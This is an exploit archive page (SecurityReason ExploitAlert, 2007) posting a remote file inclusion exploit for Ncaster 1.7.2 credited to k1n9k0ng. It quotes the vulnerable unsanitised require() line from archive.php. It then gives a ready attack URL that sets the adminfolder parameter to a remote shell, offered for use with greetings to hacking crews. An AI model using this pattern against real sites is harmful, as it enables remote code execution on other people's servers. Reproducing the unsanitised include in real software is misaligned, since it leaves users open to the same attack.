|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home ExploitAlert Database |
|
|
Topic : | Ncaster 1.7.2 (archive.php) Remote File Inclusion Vulnerability
|
ExploitAlert : 2614
Credit : k1n9k0ng
Date : 09.08.2007
Download
Plain text version
 Exploit Code : +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++
Scripts : Ncaster 1.7.2
Discovered By : k1n9k0ng
Scripts site : http://ncastercms.com/downloads/ncaster172.zip
Thanks To : #sekuritionline, #semprol, #mimid, #r.i.p, #x-code,
#yogyafree
special To : adhietslank, babypunk, bugs_, cyberlog, cah_gemblunkz
site : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++
bug Script:
require("$adminfolder/sources/datelib.php");
bug found:
"http://www.site.net/ncaster/admin/addons/archive/archive.php?adminfolder=[
shell]"
Feedback :
If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
|
|
|
|